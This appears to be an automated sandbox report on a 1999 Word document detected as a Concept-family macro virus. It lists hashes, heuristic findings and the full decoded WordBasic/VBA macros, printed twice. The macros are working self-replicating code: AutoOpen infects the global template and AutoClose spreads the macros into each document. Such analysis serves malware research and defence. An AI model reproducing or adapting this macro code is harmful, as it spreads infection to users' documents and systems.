Office (OLE) malware analysis — malicious · 1e1f176d4b0522f5

MALICIOUS

Office (OLE)

49.0 KB Created: 1999-03-15 07:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d5fa8ae12d0af33025f4ec04b794dc47 SHA-1: d40f28489431858932941c3a6b26c9fb4d002582 SHA-256: 1e1f176d4b0522f5579face97070419eddb5f3498e96d09618d382622e75a000

136 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample exhibits high-confidence indicators of legacy WordBasic macro virus activity and standard VBA macros. The AutoClose macro is designed to copy itself and other global macros (AutoOpen, Info, FilePrint, FileTemplates, ToolsMacro) into the current document, effectively attempting to embed malicious functionality. The presence of AutoOpen and AutoClose macros, along with legacy markers, strongly suggests a self-propagating malicious document.

Heuristics 5

ClamAV: Doc.Trojan.Concept-28 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Concept-28
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
sTMacro$ = sMe$ + ":AutoOpen"
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Attribute VB_Name = "AutoClose"
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2632 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2632 bytes
SHA-256: `28b2cead110a00e4215162ac79b1f0a0eb95beedd1a5700e99aed386e58173b0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub Macro1() Attribute Macro1.VB_Description = "Macro recorded 15/03/99 by PU Sumbawa" Attribute Macro1.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Macro1" ' ' Macro1 Macro ' Macro recorded 15/03/99 by PU Sumbawa ' CommandBars("Stop Recording").Visible = False End Sub Attribute VB_Name = "AutoClose" Public Sub MAIN() Dim sMe$ Dim sTMacro$ sMe$ = WordBasic.[FileName$]() On Error GoTo -1: On Error GoTo done WordBasic.FileSaveAs Name:=sMe$, Format:=1 sTMacro$ = sMe$ + ":AutoOpen" WordBasic.MacroCopy "Global:AutoOpen", sTMacro$ sTMacro$ = sMe$ + ":AutoClose" WordBasic.MacroCopy "Global:AutoClose", sTMacro$ sTMacro$ = sMe$ + ":MMIN" WordBasic.MacroCopy "Global:Info", sTMacro$ sTMacro$ = sMe$ + ":MMFP" WordBasic.MacroCopy "Global:FilePrint", sTMacro$ sTMacro$ = sMe$ + ":MMFT" WordBasic.MacroCopy "Global:FileTemplates", sTMacro$ sTMacro$ = sMe$ + ":MMTM" WordBasic.MacroCopy "Global:ToolsMacro", sTMacro$ WordBasic.FileSaveAll 1, 1 WordBasic.Call "info" done: End Sub Attribute VB_Name = "Info" Attribute VB_Name = "FilePrint" Attribute VB_Name = "FileTemplates" Public Sub MAIN() Attribute MAIN.VB_Description = "Changes the active template and the template options" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.MMFT.MAIN" Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileTemplates(False) WordBasic.CurValues.FileTemplates dlg On Error GoTo -1: On Error GoTo Selesai WordBasic.Dialog.FileTemplates dlg WordBasic.FileTemplates dlg Selesai: End Sub Attribute VB_Name = "AutoOpen" Public Sub MAIN() Dim sMe$ Dim sTMacro$ sMe$ = WordBasic.[FileName$]() On Error GoTo -1: On Error GoTo done WordBasic.FileSaveAs Name:=sMe$, Format:=1 sTMacro$ = sMe$ + ":AutoOpen" WordBasic.MacroCopy sTMacro$, "Global:AutoOpen" sTMacro$ = sMe$ + ":AutoClose" WordBasic.MacroCopy sTMacro$, "Global:AutoClose" sTMacro$ = sMe$ + ":MMIN" WordBasic.MacroCopy sTMacro$, "Global:Info" sTMacro$ = sMe$ + ":MMFP" WordBasic.MacroCopy sTMacro$, "Global:FilePrint" sTMacro$ = sMe$ + ":MMFT" WordBasic.MacroCopy sTMacro$, "Global:FileTemplates" sTMacro$ = sMe$ + ":MMTM" WordBasic.MacroCopy sTMacro$, "Global:ToolsMacro" WordBasic.FileSaveAll 1, 1 WordBasic.Call "info" done: End Sub Attribute VB_Name = "ToolsMacro" Public Sub MAIN() End Sub

SHA-256: 28b2cead110a00e4215162ac79b1f0a0eb95beedd1a5700e99aed386e58173b0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub Macro1()
Attribute Macro1.VB_Description = "Macro recorded 15/03/99 by PU Sumbawa"
Attribute Macro1.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Macro1"
'
' Macro1 Macro
' Macro recorded 15/03/99 by PU Sumbawa
'
    CommandBars("Stop Recording").Visible = False
End Sub

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
Dim sMe$
Dim sTMacro$
sMe$ = WordBasic.[FileName$]()
On Error GoTo -1: On Error GoTo done
WordBasic.FileSaveAs Name:=sMe$, Format:=1
sTMacro$ = sMe$ + ":AutoOpen"
WordBasic.MacroCopy "Global:AutoOpen", sTMacro$
sTMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy "Global:AutoClose", sTMacro$
sTMacro$ = sMe$ + ":MMIN"
WordBasic.MacroCopy "Global:Info", sTMacro$
sTMacro$ = sMe$ + ":MMFP"
WordBasic.MacroCopy "Global:FilePrint", sTMacro$
sTMacro$ = sMe$ + ":MMFT"
WordBasic.MacroCopy "Global:FileTemplates", sTMacro$
sTMacro$ = sMe$ + ":MMTM"
WordBasic.MacroCopy "Global:ToolsMacro", sTMacro$
WordBasic.FileSaveAll 1, 1
WordBasic.Call "info"
done:
End Sub

Attribute VB_Name = "Info"

Attribute VB_Name = "FilePrint"

Attribute VB_Name = "FileTemplates"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Changes the active template and the template options"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.MMFT.MAIN"
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileTemplates(False)
WordBasic.CurValues.FileTemplates dlg
On Error GoTo -1: On Error GoTo Selesai
WordBasic.Dialog.FileTemplates dlg
WordBasic.FileTemplates dlg
Selesai:
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Dim sMe$
Dim sTMacro$
sMe$ = WordBasic.[FileName$]()
On Error GoTo -1: On Error GoTo done
WordBasic.FileSaveAs Name:=sMe$, Format:=1
sTMacro$ = sMe$ + ":AutoOpen"
WordBasic.MacroCopy sTMacro$, "Global:AutoOpen"
sTMacro$ = sMe$ + ":AutoClose"
WordBasic.MacroCopy sTMacro$, "Global:AutoClose"
sTMacro$ = sMe$ + ":MMIN"
WordBasic.MacroCopy sTMacro$, "Global:Info"
sTMacro$ = sMe$ + ":MMFP"
WordBasic.MacroCopy sTMacro$, "Global:FilePrint"
sTMacro$ = sMe$ + ":MMFT"
WordBasic.MacroCopy sTMacro$, "Global:FileTemplates"
sTMacro$ = sMe$ + ":MMTM"
WordBasic.MacroCopy sTMacro$, "Global:ToolsMacro"
WordBasic.FileSaveAll 1, 1
WordBasic.Call "info"
done:
End Sub

Attribute VB_Name = "ToolsMacro"

Public Sub MAIN()
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.